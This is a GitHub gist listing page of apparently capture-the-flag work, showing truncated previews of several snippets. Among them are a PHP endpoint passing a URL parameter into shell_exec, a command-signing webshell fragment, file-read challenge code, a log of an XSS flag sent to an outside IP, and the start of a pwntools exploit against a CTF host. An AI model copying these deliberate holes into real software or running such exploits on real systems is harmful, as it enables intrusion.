No pain no gain

Cheng-Ju (Sam) Shih honor2016tw

No pain no gain

63 followers · 384 following

NTNU EE × CS × fin
Taiwan, Taipei
15:52 (UTC +08:00)
honor16.tw
@honor2016tw
in/honor2016tw
https://wakatime.com/@honor2016tw

View GitHub Profile

Recently created

Least recently created

Recently updated

Least recently updated

honor2016tw / gist:00dcfb263ddcab911dfba1b377742a00

Created June 7, 2020 03:06

O:4:"User":2:{s:4:"name";s:5:"honor";s:11:"Usertoken";s:32:"0fb3fd5e3a65707c85568cfa566c9731";}

honor2016tw / gist:0b4abf796b9b4a878ab5587dd163e621

Created June 7, 2020 02:37

{"output":"<?php\n\nheader('Content-Type: application\/json');\n\nif ($file = @$_GET['get']) {\n    $output = shell_exec(\"cat '$file'\");\n    \n    if ($output !== null) {\n        echo json_encode([\n            'output' => $output\n        ]);\n    } else {\n        echo json_encode([\n            'error' => 'cannot get file'\n        ]);\n    }\n} else {\n    echo json_encode([\n        'error' => 'empty file path'\n    ]);\n}\n"}

honor2016tw / gist:ae9ed634255e142fbd72f2bb140b7e8b

Created January 16, 2020 15:37

	<?php
	function run() {
	if (isset($_GET['cmd']) && isset($_GET['sig'])) {
	$cmd = hash('SHA512', $_SERVER['REMOTE_ADDR']) ^ (string) $_GET['cmd'];
	$key = $_SERVER['HTTP_USER_AGENT'].sha1($_SERVER['HTTP_HOST']); // user agent + sha1(request header)
	echo "user agent:".$_SERVER['HTTP_USER_AGENT']."\n";
	echo "http_host:".$_SERVER['HTTP_HOST']."\n";
	echo "remote_addr:".$_SERVER['REMOTE_ADDR']."\n";
	$sig = hash_hmac('SHA512', $cmd, $key);
	echo "sig:".$sig."\n";

honor2016tw / gist:83f53d4e9fc02e7ea6f3940962577224

Created January 13, 2020 13:31

FLAG{PikAPikApikaPikap1Ka}

honor2016tw / gist:7197dce1319a3408a8572ef6ca578f0e

Created January 12, 2020 14:36

	<?php if (isset($_GET['info'])) die(phpinfo());
	$filename = $_GET['f']??"kophp.php";
	if (isset($_GET['c']) && strlen($_GET['c']) < 87)
	{
	$f = "/tmp/" . uniqid(rand() , true);
	if (stripos($_GET['c'], "path")) exit();
	file_put_contents($f, $_GET['c']);
	die($f);
	}
	strtolower($filename[0]) == "p" ? die("Bad 🍊!") : die(htmlspecialchars(file_get_contents($filename)));

honor2016tw / gist:ead081ceb0c4aefd31a0c0a6f5f520c3

Created January 12, 2020 05:18

	root@whcsc-ubuntu-16:~# php -S 0.0.0.0:808 -t ./
	PHP 7.0.33-0ubuntu0.16.04.7 Development Server started at Sun Jan 12 05:08:29 2020
	Listening on http://0.0.0.0:808
	Document root is /root
	Press Ctrl-C to quit.
	[Sun Jan 12 05:17:55 2020] 140.113.216.163:58874 [200]: /flag=FLAG%7Bu_r_m3ow_xss_m4ster%7D

honor2016tw / gist:c199d718e768443d3c18beb77fe52694

Created January 12, 2020 03:27

	#coding=utf-8
	from Crypto.Hash import MD5
	import sys

	target = sys.argv[1]

	count = 0
	while 1:
	h = MD5.new()
	h.update('kaibro{}'.format(count))

honor2016tw / gist:8714f8baba2ca0b6699275531d741b2e

Created January 12, 2020 00:38

	#!/usr/bin/env python
	from pwn import *

	context(arch='amd64',log_level='debug')
	r = remote('eductf.zoolab.org', 10105 )
	binary = ELF('impossible')
	libc = ELF('./libc-2.27.so')
	r.sendlineafter( ': ' , str(-2147483648))

	magic = 0x10a38c

honor2016tw / gist:449cba5ea7c4fa21f373ecacf738fd22

Created January 11, 2020 12:20

	package com.kaibro.rmi;

	import java.rmi.registry.LocateRegistry;
	import java.rmi.registry.Registry;

	public class Client {

	public static void main(String[] args) {

	String host = "140.113.203.209";

honor2016tw / gist:410b2b016cac52f2800b43783a85a5ec

Created January 2, 2020 11:44

	<?php
	include_once('flag.php');
	echo strlen($fllllllag) . "\n";
	if ((isset($_POST['😂']) and isset($_POST['🤣']) and isset($_GET['KEY'])) or isset($_GET['is_this_flag？'])){
	echo "A:".$_POST['😂']."\n";
	echo "B:".$_POST['🤣']."\n";
	echo "C:".$_POST['😂']."\n";
	echo "D:".$_POST['🤣']."\n";
	srand(20191231 + 20200101 + time());
	$mystr = 'Happy';

NewerOlder